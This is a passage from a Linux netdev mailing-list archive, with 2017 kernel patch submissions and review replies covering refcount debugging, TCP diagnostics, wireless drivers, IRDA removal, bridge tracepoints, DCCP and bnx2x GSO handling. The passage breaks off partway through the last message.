Netdev List
 help / color / mirror / Atom feed
* Re: tip -ENOBOOT - bisected to locking/refcounts, x86/asm: Implement fast refcount overflow protection
From: Kees Cook @ 2017-08-31  4:01 UTC (permalink / raw)
  To: Mike Galbraith, David S. Miller
  Cc: LKML, Ingo Molnar, Reshetova, Elena, Network Development
In-Reply-To: <1504149176.23109.9.camel@gmx.de>

On Wed, Aug 30, 2017 at 8:12 PM, Mike Galbraith <efault@gmx.de> wrote:
> On Wed, 2017-08-30 at 19:27 -0700, Kees Cook wrote:
>
>> Interesting! Can you try with 633547973ffc3 ("net: convert
>> sk_buff.users from atomic_t to refcount_t") reverted? I'll see if
>> running haveged will help me trigger this on my system...
>
> With that (plus 230cd1279d001 fix to it) reverted, vbox boots.

Wonderful! Thank you so much for helping track this down.

So, it seems that sk_buff.users will need some more special attention
before we can convert it to refcount.

x86-refcount will saturate with refcount_dec_and_test() if the result
is negative. But that would mean at least starting at 0. FULL should
have WARNed in this case, so I remain slightly confused why it was
missed by FULL.

Ingo, I'm not sure the best path for this. It seems we need to revert
230cd1279d001 and 633547973ffc3 and then we can restore
ARCH_HAS_REFCOUNT.

-Kees

-- 
Kees Cook
Pixel Security

^ permalink raw reply

* Re: [net-next PATCHv6 0/2] net: ethernet: Socionext Netsec
From: Florian Fainelli @ 2017-08-31  4:06 UTC (permalink / raw)
  To: linux-arm-kernel-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r, Jassi Brar,
	netdev-u79uwXL29TY76Z2rM5mHXA, devicetree-u79uwXL29TY76Z2rM5mHXA,
	davem-fT/PcQaiUtIeIZ0/mPfg9Q
  Cc: mark.rutland-5wv7dgnIgG8, arnd-r2nGTMty4D4,
	patches-QSEj5FYQhm4dnm+yROfE0A, Jassi Brar,
	robh+dt-DgEjT+Ai2ygdnm+yROfE0A, andy-/Zus8d0mwwtBDgjK7y7TUQ
In-Reply-To: <1504088657-6102-1-git-send-email-jaswinder.singh-QSEj5FYQhm4dnm+yROfE0A@public.gmane.org>

On August 30, 2017 3:24:17 AM PDT, Jassi Brar <jassisinghbrar@gmail.com> wrote:
>Hello,
>
>The OGMA/Netsec controller is used in latest SoC from
>Socionext/Fujitsu.
>
>I am refreshing the patchset by basically using official name of the IP
>from 'OGMA' to 'Netsec'. And the company is renamed too, from Fujitsu
>to Socionext to better reflect the reality.
>
> I have addressed comments (that could be) on the last revision -->
>https://patchwork.kernel.org/patch/4540651/
>
> Of course, I have scanned changes to the drivers/net/ethernet since
>last submission and integrated whichever applicable and rebased the
>driver on top of last rc.

It does not appear to be at first glance, but I will just ask anyways, this is not yet another variant of stmmac glued just a little bit differently into the SoC right?

Will take a closer look at the register set and driver tomorrow. Thanks

-- 
Florian
--
To unsubscribe from this list: send the line "unsubscribe devicetree" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply

* Re: tip -ENOBOOT - bisected to locking/refcounts, x86/asm: Implement fast refcount overflow protection
From: Kees Cook @ 2017-08-31  4:10 UTC (permalink / raw)
  To: Mike Galbraith, David S. Miller, Peter Zijlstra
  Cc: LKML, Ingo Molnar, Reshetova, Elena, Network Development
In-Reply-To: <CAGXu5j+uNU+wqWoCV+Kpdp+DQer4E3VuwO0mtXiW3Dtw_61QKA@mail.gmail.com>

On Wed, Aug 30, 2017 at 9:01 PM, Kees Cook <keescook@chromium.org> wrote:
> On Wed, Aug 30, 2017 at 8:12 PM, Mike Galbraith <efault@gmx.de> wrote:
>> On Wed, 2017-08-30 at 19:27 -0700, Kees Cook wrote:
>>
>>> Interesting! Can you try with 633547973ffc3 ("net: convert
>>> sk_buff.users from atomic_t to refcount_t") reverted? I'll see if
>>> running haveged will help me trigger this on my system...
>>
>> With that (plus 230cd1279d001 fix to it) reverted, vbox boots.
>
> Wonderful! Thank you so much for helping track this down.
>
> So, it seems that sk_buff.users will need some more special attention
> before we can convert it to refcount.
>
> x86-refcount will saturate with refcount_dec_and_test() if the result
> is negative. But that would mean at least starting at 0. FULL should
> have WARNed in this case, so I remain slightly confused why it was
> missed by FULL.

Actually, if this is a race condition it's possible that FULL is slow
enough to miss it...

I bet something briefly takes the refcount negative, and with
unchecked atomics, it come back up positive again during the race.
FULL may miss the race, and x86-refcount will catch it and saturate...

-Kees

-- 
Kees Cook
Pixel Security

^ permalink raw reply

* Re: [PATCH net-next v4 2/2] tcp_diag: report TCP MD5 signing keys and addresses
From: Eric Dumazet @ 2017-08-31  4:10 UTC (permalink / raw)
  To: Ivan Delalande; +Cc: David Miller, netdev
In-Reply-To: <20170831013312.29142-3-colona@arista.com>

On Wed, 2017-08-30 at 18:33 -0700, Ivan Delalande wrote:
> Report TCP MD5 (RFC2385) signing keys, addresses and address prefixes to
> processes with CAP_NET_ADMIN requesting INET_DIAG_INFO. Currently it is
> not possible to retrieve these from the kernel once they have been
> configured on sockets.
> 
> Signed-off-by: Ivan Delalande <colona@arista.com>
> ---
>  include/uapi/linux/inet_diag.h |   1 +
>  include/uapi/linux/tcp.h       |   9 ++++
>  net/ipv4/tcp_diag.c            | 110 ++++++++++++++++++++++++++++++++++++++---
>  3 files changed, 114 insertions(+), 6 deletions(-)
> 
> diff --git a/include/uapi/linux/inet_diag.h b/include/uapi/linux/inet_diag.h
> index 678496897a68..f52ff62bfabe 100644
> --- a/include/uapi/linux/inet_diag.h
> +++ b/include/uapi/linux/inet_diag.h
> @@ -143,6 +143,7 @@ enum {
>  	INET_DIAG_MARK,
>  	INET_DIAG_BBRINFO,
>  	INET_DIAG_CLASS_ID,
> +	INET_DIAG_MD5SIG,
>  	__INET_DIAG_MAX,
>  };
>  
> diff --git a/include/uapi/linux/tcp.h b/include/uapi/linux/tcp.h
> index 030e594bab45..15c25eccab2b 100644
> --- a/include/uapi/linux/tcp.h
> +++ b/include/uapi/linux/tcp.h
> @@ -256,4 +256,13 @@ struct tcp_md5sig {
>  	__u8	tcpm_key[TCP_MD5SIG_MAXKEYLEN];		/* key (binary) */
>  };
>  
> +/* INET_DIAG_MD5SIG */
> +struct tcp_diag_md5sig {
> +	__u8	tcpm_family;
> +	__u8	tcpm_prefixlen;
> +	__u16	tcpm_keylen;
> +	__be32	tcpm_addr[4];
> +	__u8	tcpm_key[TCP_MD5SIG_MAXKEYLEN];
> +};
> +
>  #endif /* _UAPI_LINUX_TCP_H */
> diff --git a/net/ipv4/tcp_diag.c b/net/ipv4/tcp_diag.c
> index a748c74aa8b7..65d0c34a76ee 100644
> --- a/net/ipv4/tcp_diag.c
> +++ b/net/ipv4/tcp_diag.c
> @@ -16,6 +16,7 @@
>  
>  #include <linux/tcp.h>
>  
> +#include <net/netlink.h>
>  #include <net/tcp.h>
>  
>  static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
> @@ -36,6 +37,101 @@ static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
>  		tcp_get_info(sk, info);
>  }
>  
> +#ifdef CONFIG_TCP_MD5SIG
> +static void tcp_diag_md5sig_fill(struct tcp_diag_md5sig *info,
> +				 const struct tcp_md5sig_key *key)
> +{
> +	info->tcpm_family = key->family;
> +	info->tcpm_prefixlen = key->prefixlen;
> +	info->tcpm_keylen = key->keylen;
> +	memcpy(info->tcpm_key, key->key, key->keylen);


if (key->keylen < TCP_MD5SIG_MAXKEYLEN), 
then you'll leak sensitive kernel data to user space.

Since I doubt many sockets are using MD5SIG, you could simply do at the
beginning of this function :

memset(info, 0, sizeof(*info));

> +
> +	if (key->family == AF_INET) {
> +		memset(info->tcpm_addr, 0, sizeof(info->tcpm_addr));

then also remove this memset() since the prior memset would do this
already.

> +		info->tcpm_addr[0] = key->addr.a4.s_addr;
> +	}
> +	#if IS_ENABLED(CONFIG_IPV6)
> +	else if (key->family == AF_INET6) {
> +		memcpy(&info->tcpm_addr, &key->addr.a6,
> +		       sizeof(info->tcpm_addr));
> +	}
> +	#endif
> +}
> +

^ permalink raw reply

* Re: [PATCH 0/4] irda: move it to drivers/staging so we can delete it
From: Greg KH @ 2017-08-31  4:30 UTC (permalink / raw)
  To: Ondrej Zary; +Cc: devel, netdev, samuel, David Miller, linux-kernel
In-Reply-To: <201708292332.58569.linux@rainbow-software.org>

On Tue, Aug 29, 2017 at 11:32:58PM +0200, Ondrej Zary wrote:
> On Tuesday 29 August 2017 01:42:08 David Miller wrote:
> > From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
> > Date: Sun, 27 Aug 2017 17:03:30 +0200
> >
> > > The IRDA code has long been obsolete and broken.  So, to keep people
> > > from trying to use it, and to prevent people from having to maintain it,
> > > let's move it to drivers/staging/ so that we can delete it entirely from
> > > the kernel in a few releases.
> >
> > No objection, I'll apply this to net-next, thanks Greg.
> 
> IRDA works fine in Debian 9 (kernel 4.9) and I use it for simple file 
> transfer. Hope I'm not the only one...
> 
> # irattach /dev/ttyS0 -d tekram -s
> # irdadump
> 21:28:52.830350 xid:cmd aed8eb79 > ffffffff S=6 s=0 (14)
> 21:28:52.922368 xid:cmd aed8eb79 > ffffffff S=6 s=1 (14)
> 21:28:53.014350 xid:cmd aed8eb79 > ffffffff S=6 s=2 (14)
> 21:28:53.106338 xid:cmd aed8eb79 > ffffffff S=6 s=3 (14)
> 21:28:53.190276 xid:rsp aed8eb79 < 000035d1 S=6 s=3 Nokia 6230i hint=b125 [ 
> PnP Modem Fax Telephony IrCOMM IrOBEX ] (28)
> 21:28:53.198384 xid:cmd aed8eb79 > ffffffff S=6 s=4 (14)
> 21:28:53.290382 xid:cmd aed8eb79 > ffffffff S=6 s=5 (14)
> 21:28:53.382341 xid:cmd aed8eb79 > ffffffff S=6 s=* pentium hint=0400 [ 
> Computer ] (23)
> ^C
> 8 packets received by filter
> 
> $ obexftp -i -l MMC
> Connecting..\done
> Receiving "MMC".../<?xml version="1.0"?>
> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"
>  [ <!ATTLIST folder mem-type CDATA #IMPLIED> ]>
> <folder-listing version="1.0">
>     <parent-folder />
>     <file name="Image000.jpg" size="304300" modified="20160219T135924" 
> user-perm="RWD"/>
>     <file name="Image001.jpg" size="270037" modified="20170811T233122" 
> user-perm="RWD"/>
>     <file name="Image004.jpg" size="53519" modified="20170814T074550" 
> user-perm="RWD"/>
> ....
> $ obexftp -i -c MMC -g Image004.jpg
> Connecting..\done
> Sending "MMC"...|done
> Receiving "Image004.jpg"...-done
> Disconnecting..\done

Odd, and is this just a ir device connected to a "real" serial port, or
a specific IRDA device?

thanks,

greg k-h

^ permalink raw reply

* Re: tip -ENOBOOT - bisected to locking/refcounts, x86/asm: Implement fast refcount overflow protection
From: Mike Galbraith @ 2017-08-31  4:38 UTC (permalink / raw)
  To: Kees Cook, David S. Miller, Peter Zijlstra
  Cc: LKML, Ingo Molnar, Reshetova, Elena, Network Development
In-Reply-To: <CAGXu5jKYPp5D+YxtqrJXsi48UUbjfeREngsys-dU1eP4RnnL+w@mail.gmail.com>

On Wed, 2017-08-30 at 21:10 -0700, Kees Cook wrote:
> On Wed, Aug 30, 2017 at 9:01 PM, Kees Cook <keescook@chromium.org> wrote:
> > On Wed, Aug 30, 2017 at 8:12 PM, Mike Galbraith <efault@gmx.de> wrote:
> >> On Wed, 2017-08-30 at 19:27 -0700, Kees Cook wrote:
> >>
> >>> Interesting! Can you try with 633547973ffc3 ("net: convert
> >>> sk_buff.users from atomic_t to refcount_t") reverted? I'll see if
> >>> running haveged will help me trigger this on my system...
> >>
> >> With that (plus 230cd1279d001 fix to it) reverted, vbox boots.
> >
> > Wonderful! Thank you so much for helping track this down.
> >
> > So, it seems that sk_buff.users will need some more special attention
> > before we can convert it to refcount.
> >
> > x86-refcount will saturate with refcount_dec_and_test() if the result
> > is negative. But that would mean at least starting at 0. FULL should
> > have WARNed in this case, so I remain slightly confused why it was
> > missed by FULL.
> 
> Actually, if this is a race condition it's possible that FULL is slow
> enough to miss it...
> 
> I bet something briefly takes the refcount negative, and with
> unchecked atomics, it come back up positive again during the race.
> FULL may miss the race, and x86-refcount will catch it and saturate...

Hm, I'll go have a stare.. not that that's likely to turn anything up,
memory ordering stares usually inducing a zombie like state.

	-Mike

^ permalink raw reply

* Re: [PATCH] rtlwifi: rtl8723be: fix duplicated code for different branches
From: Larry Finger @ 2017-08-31  4:42 UTC (permalink / raw)
  To: Gustavo A. R. Silva, Chaoming Li, Kalle Valo
  Cc: linux-wireless, netdev, linux-kernel
In-Reply-To: <20170830170424.GA19424@embeddedgus>

On 08/30/2017 12:04 PM, Gustavo A. R. Silva wrote:
> Refactor code in order to avoid identical code for different branches.
> 
> Addresses-Coverity-ID: 1248728
> Signed-off-by: Gustavo A. R. Silva <gustavo@embeddedor.com>

According to Realtek, this change is OK.

Acked-by: Larry Finger <Larry.Finger@lwfinger.net>

Thanks,

Larry

> ---
> This issue was reported by Coverity and it was tested by compilation only.
> Please, verify if this is not a copy/paste error.
> Also, notice this code has been there since 2014.
> 
>   drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c | 8 ++------
>   1 file changed, 2 insertions(+), 6 deletions(-)
> 
> diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c
> index 131c0d1..15c117e 100644
> --- a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c
> +++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c
> @@ -883,12 +883,8 @@ static void rtl8723be_dm_txpower_tracking_callback_thermalmeter(
>   	if ((rtldm->power_index_offset[RF90_PATH_A] != 0) &&
>   	    (rtldm->txpower_track_control)) {
>   		rtldm->done_txpower = true;
> -		if (thermalvalue > rtlefuse->eeprom_thermalmeter)
> -			rtl8723be_dm_tx_power_track_set_power(hw, BBSWING, 0,
> -							     index_for_channel);
> -		else
> -			rtl8723be_dm_tx_power_track_set_power(hw, BBSWING, 0,
> -							     index_for_channel);
> +		rtl8723be_dm_tx_power_track_set_power(hw, BBSWING, 0,
> +						      index_for_channel);
>   
>   		rtldm->swing_idx_cck_base = rtldm->swing_idx_cck;
>   		rtldm->swing_idx_ofdm_base[RF90_PATH_A] =
> 

^ permalink raw reply

* Re: [GIT] Networking
From: Kalle Valo @ 2017-08-31  4:44 UTC (permalink / raw)
  To: David Miller; +Cc: pavel, xiyou.wangcong, torvalds, akpm, netdev, linux-kernel
In-Reply-To: <20170830.105447.125174575140677062.davem@davemloft.net>

David Miller <davem@davemloft.net> writes:

> From: Kalle Valo <kvalo@codeaurora.org>
> Date: Wed, 30 Aug 2017 20:31:31 +0300
>
>> AFAICS the bug was introduced by 9df86e2e702c6 back in 2010. If the bug
>> has been there for 7 years so waiting for a few more weeks should not
>> hurt.
>
> As a maintainer you have a right to handle bug fixing in that way, but
> certainly that is not how I would handle this.
>
> It's easy to validate this fix, it's extremely unlikely to cause
> a regression, and fixes a problem someone actually was able to
> trigger.
>
> Deferring to -next only has the side effect of making people wait
> longer for the fix.

Yeah, you are right there. I did actually ponder which I tree should
commit it back in July but due to various reasons decided differently.

-- 
Kalle Valo

^ permalink raw reply

* Re: [PATCH] rtlwifi: btcoex: 23b 1ant: fix duplicated code for different branches
From: Larry Finger @ 2017-08-31  4:48 UTC (permalink / raw)
  To: Gustavo A. R. Silva, Chaoming Li, Kalle Valo
  Cc: linux-wireless, netdev, linux-kernel
In-Reply-To: <20170830134223.GA13596@embeddedgus>

On 08/30/2017 08:42 AM, Gustavo A. R. Silva wrote:
> Refactor code in order to avoid identical code for different branches.
> 
> This issue was detected with the help of Coccinelle.
> 
> Addresses-Coverity-ID: 1226788
> Signed-off-by: Gustavo A. R. Silva <gustavo@embeddedor.com>
> ---
> This issue was reported by Coverity and it was tested by compilation only.
> I'm suspicious this may be a copy/paste error. Please, verify.
> 
>   .../net/wireless/realtek/rtlwifi/btcoexist/halbtc8723b1ant.c   | 10 ++--------
>   1 file changed, 2 insertions(+), 8 deletions(-)

This change is not correct. When bt_link_info->sco_exist is true, the call should be

				halbtc8723b1ant_limited_rx(btcoexist,
							   NORMAL_EXEC, true,
							   false, 0x5);

NACK

I will push the correct patch.

Larry

^ permalink raw reply

* Re: [PATCH net-next] devlink: Maintain consistency in mac field name
From: David Miller @ 2017-08-31  5:06 UTC (permalink / raw)
  To: dsahern; +Cc: netdev, arkadis
In-Reply-To: <1504138050-20170-1-git-send-email-dsahern@gmail.com>

From: David Ahern <dsahern@gmail.com>
Date: Wed, 30 Aug 2017 17:07:30 -0700

> IPv4 name uses "destination ip" as does the IPv6 patch set.
> Make the mac field consistent.
> 
> Signed-off-by: David Ahern <dsahern@gmail.com>

Applied, thanks.

^ permalink raw reply

* Re: [PATCH net-next] liquidio: fix crash in presence of zeroed-out base address regs
From: David Miller @ 2017-08-31  5:07 UTC (permalink / raw)
  To: felix.manlunas
  Cc: netdev, raghu.vatsavayi, derek.chickles, satananda.burla,
	ricardo.farrington
In-Reply-To: <20170830231953.GA14744@felix-thinkpad.cavium.com>

From: Felix Manlunas <felix.manlunas@cavium.com>
Date: Wed, 30 Aug 2017 16:19:53 -0700

> From: Rick Farrington <ricardo.farrington@cavium.com>
> 
> Fix crash in linux PF driver when BARs have been cleared/de-programmed;
> fail early init (prior to mapping BARs) if the BAR0 or
> BAR1 registers are zero.
> 
> This situation can arise when the PF is added to a VM (PCI pass-through),
> then a PF FLR is issued (in the VM).  After this occurs, the BAR registers
> will be zero. If we attempt to load the PF driver in the host
> (after VM has been shutdown), the host can reset.
> 
> Signed-off-by: Rick Farrington <ricardo.farrington@cavium.com>
> Signed-off-by: Raghu Vatsavayi <raghu.vatsavayi@cavium.com>
> Signed-off-by: Felix Manlunas <felix.manlunas@cavium.com>

Applied, thanks.

^ permalink raw reply

* Re: [pull request][net-next 0/3] Mellanox, mlx5 GRE tunnel offloads
From: David Miller @ 2017-08-31  5:15 UTC (permalink / raw)
  To: saeedm; +Cc: netdev
In-Reply-To: <20170830230409.15176-1-saeedm@mellanox.com>

From: Saeed Mahameed <saeedm@mellanox.com>
Date: Thu, 31 Aug 2017 02:04:06 +0300

> The following changes provide GRE tunnel offloads for mlx5 ethernet netdevice driver.
> 
> For more details please see tag log message below.
> Please pull and let me know if there's any problem.
> 
> Note: this series doesn't conflict with the ongoing net mlx5 submission.

Looks good, pulled.

^ permalink raw reply

* Re: [PATCH] net: dccp: Add handling of IPV6_PKTOPTIONS to dccp_v6_do_rcv()
From: David Miller @ 2017-08-31  5:16 UTC (permalink / raw)
  To: tulup; +Cc: gerrit, netdev, linux-kernel, dccp
In-Reply-To: <20170830090435.58406d1b@dev>

From: Andrii Vladyka <tulup@mail.ru>
Date: Wed, 30 Aug 2017 09:04:35 +0300

> +	if (opt_skb) 
                    ^^^^

Trailing whitespace.

> @@ -653,6 +647,36 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
>  		__kfree_skb(opt_skb);
>  	kfree_skb(skb);
>  	return 0;
> +	
   ^^^^^^^

Likewise.

^ permalink raw reply

* [PATCH net-next] bridge: add tracepoint in br_fdb_update
From: Roopa Prabhu @ 2017-08-31  5:18 UTC (permalink / raw)
  To: davem; +Cc: netdev, nikolay, f.fainelli, andrew, bridge

From: Roopa Prabhu <roopa@cumulusnetworks.com>

This extends bridge fdb table tracepoints to also cover
learned fdb entries in the br_fdb_update path. Note that
unlike other tracepoints I have moved this to when the fdb
is modified because this is in the datapath and can generate
a lot of noise in the trace output. br_fdb_update is also called
from added_by_user context in the NTF_USE case which is already
traced ..hence the !added_by_user check.

Signed-off-by: Roopa Prabhu <roopa@cumulusnetworks.com>
---
 include/trace/events/bridge.h | 31 +++++++++++++++++++++++++++++++
 net/bridge/br_fdb.c           |  5 ++++-
 net/core/net-traces.c         |  1 +
 3 files changed, 36 insertions(+), 1 deletion(-)

diff --git a/include/trace/events/bridge.h b/include/trace/events/bridge.h
index 0f1cde0..1bee3e7 100644
--- a/include/trace/events/bridge.h
+++ b/include/trace/events/bridge.h
@@ -92,6 +92,37 @@ TRACE_EVENT(fdb_delete,
 		  __entry->addr[4], __entry->addr[5], __entry->vid)
 );
 
+TRACE_EVENT(br_fdb_update,
+
+	TP_PROTO(struct net_bridge *br, struct net_bridge_port *source,
+		 const unsigned char *addr, u16 vid, bool added_by_user),
+
+	TP_ARGS(br, source, addr, vid, added_by_user),
+
+	TP_STRUCT__entry(
+		__string(br_dev, br->dev->name)
+		__string(dev, source->dev->name)
+		__array(unsigned char, addr, ETH_ALEN)
+		__field(u16, vid)
+		__field(bool, added_by_user)
+	),
+
+	TP_fast_assign(
+		__assign_str(br_dev, br->dev->name);
+		__assign_str(dev, source->dev->name);
+		memcpy(__entry->addr, addr, ETH_ALEN);
+		__entry->vid = vid;
+		__entry->added_by_user = added_by_user;
+	),
+
+	TP_printk("br_dev %s source %s addr %02x:%02x:%02x:%02x:%02x:%02x vid %u added_by_user %d",
+		  __get_str(br_dev), __get_str(dev), __entry->addr[0],
+		  __entry->addr[1], __entry->addr[2], __entry->addr[3],
+		  __entry->addr[4], __entry->addr[5], __entry->vid,
+		  __entry->added_by_user)
+);
+
+
 #endif /* _TRACE_BRIDGE_H */
 
 /* This part must be outside protection */
diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c
index be5e1da..4ea5c8b 100644
--- a/net/bridge/br_fdb.c
+++ b/net/bridge/br_fdb.c
@@ -583,8 +583,10 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source,
 				fdb->updated = now;
 			if (unlikely(added_by_user))
 				fdb->added_by_user = 1;
-			if (unlikely(fdb_modified))
+			if (unlikely(fdb_modified)) {
+				trace_br_fdb_update(br, source, addr, vid, added_by_user);
 				fdb_notify(br, fdb, RTM_NEWNEIGH);
+			}
 		}
 	} else {
 		spin_lock(&br->hash_lock);
@@ -593,6 +595,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source,
 			if (fdb) {
 				if (unlikely(added_by_user))
 					fdb->added_by_user = 1;
+				trace_br_fdb_update(br, source, addr, vid, added_by_user);
 				fdb_notify(br, fdb, RTM_NEWNEIGH);
 			}
 		}
diff --git a/net/core/net-traces.c b/net/core/net-traces.c
index 4a0292c..1132820 100644
--- a/net/core/net-traces.c
+++ b/net/core/net-traces.c
@@ -42,6 +42,7 @@ EXPORT_TRACEPOINT_SYMBOL_GPL(fib6_table_lookup);
 EXPORT_TRACEPOINT_SYMBOL_GPL(br_fdb_add);
 EXPORT_TRACEPOINT_SYMBOL_GPL(br_fdb_external_learn_add);
 EXPORT_TRACEPOINT_SYMBOL_GPL(fdb_delete);
+EXPORT_TRACEPOINT_SYMBOL_GPL(br_fdb_update);
 #endif
 
 EXPORT_TRACEPOINT_SYMBOL_GPL(kfree_skb);
-- 
2.1.4

^ permalink raw reply related

* Re: [PATCH] net: dccp: Add handling of IPV6_PKTOPTIONS to dccp_v6_do_rcv()
From: Andrii @ 2017-08-31  5:27 UTC (permalink / raw)
  To: David Miller; +Cc: gerrit, netdev, linux-kernel, dccp
In-Reply-To: <20170830.221649.818214075248119092.davem@davemloft.net>

I'll fix and re-send. Thanks.


On 8/31/2017 8:16 AM, David Miller wrote:
> From: Andrii Vladyka <tulup@mail.ru>
> Date: Wed, 30 Aug 2017 09:04:35 +0300
>
>> +	if (opt_skb)
>                      ^^^^
>
> Trailing whitespace.
>
>> @@ -653,6 +647,36 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
>>   		__kfree_skb(opt_skb);
>>   	kfree_skb(skb);
>>   	return 0;
>> +	
>     ^^^^^^^
>
> Likewise.

^ permalink raw reply

* [PATCH] net: dccp: Add handling of IPV6_PKTOPTIONS to dccp_v6_do_rcv()
From: Andrii @ 2017-08-31  5:28 UTC (permalink / raw)
  To: David Miller; +Cc: gerrit, netdev, linux-kernel, dccp
In-Reply-To: <20170830.221649.818214075248119092.davem@davemloft.net>

[-- Attachment #1: Type: text/plain, Size: 172 bytes --]

Add handling of IPV6_PKTOPTIONS to dccp_v6_do_rcv() in net/dccp/ipv6.c, 
similar
to the handling in net/ipv6/tcp_ipv6.c

Signed-off-by: Andrii Vladyka <tulup@mail.ru>
---


[-- Attachment #2: dccp.patch --]
[-- Type: text/plain, Size: 2590 bytes --]

diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
index 1b58eac..35c2edb 100644
--- a/net/dccp/ipv6.c
+++ b/net/dccp/ipv6.c
@@ -16,6 +16,7 @@
 #include <linux/random.h>
 #include <linux/slab.h>
 #include <linux/xfrm.h>
+#include <linux/string.h>
 
 #include <net/addrconf.h>
 #include <net/inet_common.h>
@@ -30,6 +31,7 @@
 #include <net/ip6_checksum.h>
 #include <net/xfrm.h>
 #include <net/secure_seq.h>
+#include <net/sock.h>
 
 #include "dccp.h"
 #include "ipv6.h"
@@ -597,19 +599,13 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
 					       --ANK (980728)
 	 */
 	if (np->rxopt.all)
-	/*
-	 * FIXME: Add handling of IPV6_PKTOPTIONS skb. See the comments below
-	 *        (wrt ipv6_pktopions) and net/ipv6/tcp_ipv6.c for an example.
-	 */
 		opt_skb = skb_clone(skb, GFP_ATOMIC);
 
 	if (sk->sk_state == DCCP_OPEN) { /* Fast path */
 		if (dccp_rcv_established(sk, skb, dccp_hdr(skb), skb->len))
 			goto reset;
-		if (opt_skb) {
-			/* XXX This is where we would goto ipv6_pktoptions. */
-			__kfree_skb(opt_skb);
-		}
+		if (opt_skb)
+			goto ipv6_pktoptions;
 		return 0;
 	}
 
@@ -640,10 +636,8 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
 
 	if (dccp_rcv_state_process(sk, skb, dccp_hdr(skb), skb->len))
 		goto reset;
-	if (opt_skb) {
-		/* XXX This is where we would goto ipv6_pktoptions. */
-		__kfree_skb(opt_skb);
-	}
+	if (opt_skb)
+		goto ipv6_pktoptions;
 	return 0;
 
 reset:
@@ -653,6 +647,35 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
 		__kfree_skb(opt_skb);
 	kfree_skb(skb);
 	return 0;
+
+/* Handling IPV6_PKTOPTIONS skb the similar
+ * way it's done for net/ipv6/tcp_ipv6.c
+ */
+ipv6_pktoptions:
+	if (!((1 << sk->sk_state) & (DCCPF_CLOSED | DCCPF_LISTEN))) {
+		if (np->rxopt.bits.rxinfo || np->rxopt.bits.rxoinfo)
+			np->mcast_oif = inet6_iif(opt_skb);
+		if (np->rxopt.bits.rxhlim || np->rxopt.bits.rxohlim)
+			np->mcast_hops = ipv6_hdr(opt_skb)->hop_limit;
+		if (np->rxopt.bits.rxflow || np->rxopt.bits.rxtclass)
+			np->rcv_flowinfo = ip6_flowinfo(ipv6_hdr(opt_skb));
+		if (np->repflow)
+			np->flow_label = ip6_flowlabel(ipv6_hdr(opt_skb));
+		if (ipv6_opt_accepted(sk, opt_skb,
+				      &DCCP_SKB_CB(opt_skb)->header.h6)) {
+			skb_set_owner_r(opt_skb, sk);
+			memmove(IP6CB(opt_skb),
+				&DCCP_SKB_CB(opt_skb)->header.h6,
+				sizeof(struct inet6_skb_parm));
+			opt_skb = xchg(&np->pktoptions, opt_skb);
+		} else {
+			__kfree_skb(opt_skb);
+			opt_skb = xchg(&np->pktoptions, NULL);
+		}
+	}
+
+	kfree_skb(opt_skb);
+	return 0;
 }
 
 static int dccp_v6_rcv(struct sk_buff *skb)

^ permalink raw reply related

* [PATCH] bnx2x: drop packets where gso_size is too big for hardware
From: Daniel Axtens @ 2017-08-31  5:46 UTC (permalink / raw)
  To: netdev
  Cc: tlfalcon, Yuval.Mintz, ariel.elior, everest-linux-l2,
	jay.vosburgh, Daniel Axtens

If a bnx2x card is passed a GSO packet with a gso_size larger than
~9700 bytes, it will cause a firmware error that will bring the card
down:

bnx2x: [bnx2x_attn_int_deasserted3:4323(enP24p1s0f0)]MC assert!
bnx2x: [bnx2x_mc_assert:720(enP24p1s0f0)]XSTORM_ASSERT_LIST_INDEX 0x2
bnx2x: [bnx2x_mc_assert:736(enP24p1s0f0)]XSTORM_ASSERT_INDEX 0x0 = 0x00000000 0x25e43e47 0x00463e01 0x00010052
bnx2x: [bnx2x_mc_assert:750(enP24p1s0f0)]Chip Revision: everest3, FW Version: 7_13_1
... (dump of values continues) ...

Detect when gso_size + header length is greater than the maximum
packet size (9700 bytes) and drop the packet.

This raises the obvious question - how do we end up with a packet with
a gso_size that's greater than 9700? This has been observed on an
powerpc system when Open vSwitch is forwarding a packet from an
ibmveth device.

ibmveth is a bit special. It's the driver for communication between
virtual machines (aka 'partitions'/LPARs) running under IBM's
proprietary hypervisor on ppc machines. It allows sending very large
packets (up to 64kB) between LPARs. This involves some quite
'interesting' things: for example, when talking TCP, the MSS is stored
the checksum field (see ibmveth_rx_mss_helper() in ibmveth.c).

Normally on a box like this, there would be a Virtual I/O Server
(VIOS) partition that owns the physical network card. VIOS lets the
AIX partitions know when they're talking to a real network and that
they should drop their MSS. This works fine if VIOS owns the physical
network card.

However, in this case, a Linux partition owns the card (this is known
as a NovaLink setup). The negotiation between VIOS and AIX uses a
non-standard TCP option, so Linux has never supported that.  Instead,
Linux just supports receiving large packets. It doesn't support any
form of messaging/MSS negotiation back to other LPARs.

To get some clarity about where the large MSS was coming from, I asked
Thomas Falcon, the maintainer of ibmveth, for some background:

"In most cases, large segments are an aggregation of smaller packets
by the Virtual I/O Server (VIOS) partition and then are forwarded to
the Linux LPAR / ibmveth driver. These segments can be as large as
64KB. In this case, since the customer is using Novalink, I believe
what is happening is pretty straightforward: the large segments are
created by the AIX partition and then forwarded to the Linux
partition, ... The ibmveth driver doesn't do any aggregation itself
